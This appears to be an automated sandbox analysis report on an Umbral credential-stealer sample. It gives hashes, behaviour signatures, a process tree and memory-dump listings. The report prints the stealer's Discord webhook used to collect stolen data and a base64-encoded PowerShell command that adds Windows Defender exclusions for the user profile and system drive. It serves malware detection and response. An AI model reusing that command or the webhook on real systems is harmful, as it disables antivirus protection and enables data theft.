Overview

overview

10

Static

static

3

idk2.exe

windows7-x64

10

idk2.exe

windows10-2004-x64

10

Analysis

  • max time kernel
    146s
  • max time network
    151s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240226-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240226-enlocale:en-usos:windows10-2004-x64system
  • submitted
    29-02-2024 03:55

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    idk2.exe

  • Size

    235KB

  • MD5

    ce4b4e4821aba2f7ea9aad57e60f9c3c

  • SHA1

    1f01a2d44d06ced9373687ae061f81540fa1c015

  • SHA256

    8d612921eca9c96803b1057e860d2d3236869bd3658b01fb7f3402134bd0300c

  • SHA512

    727a3cc82dfdaede3fdcab6bd1a52794e90e3a41560345cc82212aaf75a00a09d63c753cf23b5318ad5b58126f29696bc4fbffac4f9ea1eee0af195712dae085

  • SSDEEP

    6144:waeJtRSyn/TlQ1VFmqGF3+re5d0KkJ4tWDwp:wNPT/xAVPWUG0KkrD

Score
10/10
umbralstealer

Malware Config

Extracted

Family

umbral

C2

https://discord.com/api/webhooks/1205352570537775114/0TwopxZF8mZAIjdEowRHAiTqFbB8pjE6dzR2ST_E7pX5YXnZRcMh5QKMfo2QE94dAXKK

Signatures

  • Detect Umbral payload 3 IoCs
  • Umbral

    Umbral stealer is an opensource moduler stealer written in C#.

    stealerumbral
  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Executes dropped EXE 1 IoCs
  • Drops file in Windows directory 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 44 IoCs
  • Suspicious use of WriteProcessMemory 7 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\idk2.exe
    "C:\Users\Admin\AppData\Local\Temp\idk2.exe"
    1⤵
    • Checks computer location settings
    • Drops file in Windows directory
    • Suspicious use of WriteProcessMemory
    PID:4092
    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGQAYwBhACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHoAbABmACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHYAbQBnACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHcAeQBzACMAPgA="
      2⤵
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:4060
    • C:\Windows\Umbral.exe
      "C:\Windows\Umbral.exe"
      2⤵
      • Executes dropped EXE
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:3580
      • C:\Windows\System32\Wbem\wmic.exe
        "wmic.exe" csproduct get uuid
        3⤵
        • Suspicious use of AdjustPrivilegeToken
        PID:3452

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_dfp54fm0.fd0.ps1
    Filesize

    60B

    MD5

    d17fe0a3f47be24a6453e9ef58c94641

    SHA1

    6ab83620379fc69f80c0242105ddffd7d98d5d9d

    SHA256

    96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

    SHA512

    5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

    Download Submit

  • C:\Windows\Umbral.exe
    Filesize

    230KB

    MD5

    e57355d016f869b612bb5512bc9929da

    SHA1

    8d49a140dbe7ef50a1052bbb90514f84ff211daa

    SHA256

    516a9e91fdd13f05c4a8df291b9d2bb1571d5ce6223b883a6cae345cf0e75643

    SHA512

    4191df273c90a6e950bbae1931abe8d9e735ab9ff947fe0331664dcf8b96fdc50bb3436761d4e5ce190afd8a503ccad0fe2eb211b6af8a63aa6c6ae1bb7aee19

    Download Submit

  • C:\Windows\Umbral.exe
    Filesize

    92KB

    MD5

    5376f58e3a6a2f5434ebb5631075a7e0

    SHA1

    445c2227bcebdfae069293696cb81faa4c68c237

    SHA256

    4a7d9ba59998ea1df0e28f6aa58bb3195213df348f6acf80223a406f6ce87c81

    SHA512

    8b40e09d8d086402364585628cfdac80c4e20c16da8ac655022fd50686c0a204830f87720641db4d8f8b1b5da1e36c3db4747508b04270a6ed1a75eb072af8d0

    Download Submit

  • memory/3580-17-0x000001B4A1810000-0x000001B4A1820000-memory.dmp

    Filesize

    64KB

    Download

  • memory/3580-11-0x000001B487250000-0x000001B487290000-memory.dmp

    Filesize

    256KB

    Download

  • memory/3580-12-0x00007FFAA5050000-0x00007FFAA5B11000-memory.dmp

    Filesize

    10.8MB

    Download

  • memory/3580-28-0x00007FFAA5050000-0x00007FFAA5B11000-memory.dmp

    Filesize

    10.8MB

    Download

  • memory/4060-34-0x0000000005460000-0x000000000547E000-memory.dmp

    Filesize

    120KB

    Download

  • memory/4060-38-0x0000000006CF0000-0x0000000006D22000-memory.dmp

    Filesize

    200KB

    Download

  • memory/4060-16-0x0000000005AF0000-0x0000000006118000-memory.dmp

    Filesize

    6.2MB

    Download

  • memory/4060-19-0x0000000005840000-0x0000000005862000-memory.dmp

    Filesize

    136KB

    Download

  • memory/4060-21-0x00000000059E0000-0x0000000005A46000-memory.dmp

    Filesize

    408KB

    Download

  • memory/4060-15-0x00000000054B0000-0x00000000054C0000-memory.dmp

    Filesize

    64KB

    Download

  • memory/4060-14-0x0000000074F60000-0x0000000075710000-memory.dmp

    Filesize

    7.7MB

    Download

  • memory/4060-22-0x0000000006120000-0x0000000006186000-memory.dmp

    Filesize

    408KB

    Download

  • memory/4060-33-0x0000000006290000-0x00000000065E4000-memory.dmp

    Filesize

    3.3MB

    Download

  • memory/4060-13-0x0000000002DD0000-0x0000000002E06000-memory.dmp

    Filesize

    216KB

    Download

  • memory/4060-35-0x00000000067D0000-0x000000000681C000-memory.dmp

    Filesize

    304KB

    Download

  • memory/4060-36-0x00000000054B0000-0x00000000054C0000-memory.dmp

    Filesize

    64KB

    Download

  • memory/4060-37-0x000000007EF90000-0x000000007EFA0000-memory.dmp

    Filesize

    64KB

    Download

  • memory/4060-18-0x00000000054B0000-0x00000000054C0000-memory.dmp

    Filesize

    64KB

    Download

  • memory/4060-39-0x0000000070D80000-0x0000000070DCC000-memory.dmp

    Filesize

    304KB

    Download

  • memory/4060-49-0x0000000006CC0000-0x0000000006CDE000-memory.dmp

    Filesize

    120KB

    Download

  • memory/4060-50-0x00000000076F0000-0x0000000007793000-memory.dmp

    Filesize

    652KB

    Download

  • memory/4060-51-0x0000000008070000-0x00000000086EA000-memory.dmp

    Filesize

    6.5MB

    Download

  • memory/4060-52-0x0000000007A30000-0x0000000007A4A000-memory.dmp

    Filesize

    104KB

    Download

  • memory/4060-53-0x0000000007AA0000-0x0000000007AAA000-memory.dmp

    Filesize

    40KB

    Download

  • memory/4060-54-0x0000000007CC0000-0x0000000007D56000-memory.dmp

    Filesize

    600KB

    Download

  • memory/4060-55-0x0000000007C30000-0x0000000007C41000-memory.dmp

    Filesize

    68KB

    Download

  • memory/4060-56-0x0000000007C70000-0x0000000007C7E000-memory.dmp

    Filesize

    56KB

    Download

  • memory/4060-57-0x0000000007C80000-0x0000000007C94000-memory.dmp

    Filesize

    80KB

    Download

  • memory/4060-58-0x0000000007D60000-0x0000000007D7A000-memory.dmp

    Filesize

    104KB

    Download

  • memory/4060-59-0x0000000007CB0000-0x0000000007CB8000-memory.dmp

    Filesize

    32KB

    Download

  • memory/4060-62-0x0000000074F60000-0x0000000075710000-memory.dmp

    Filesize

    7.7MB

    Download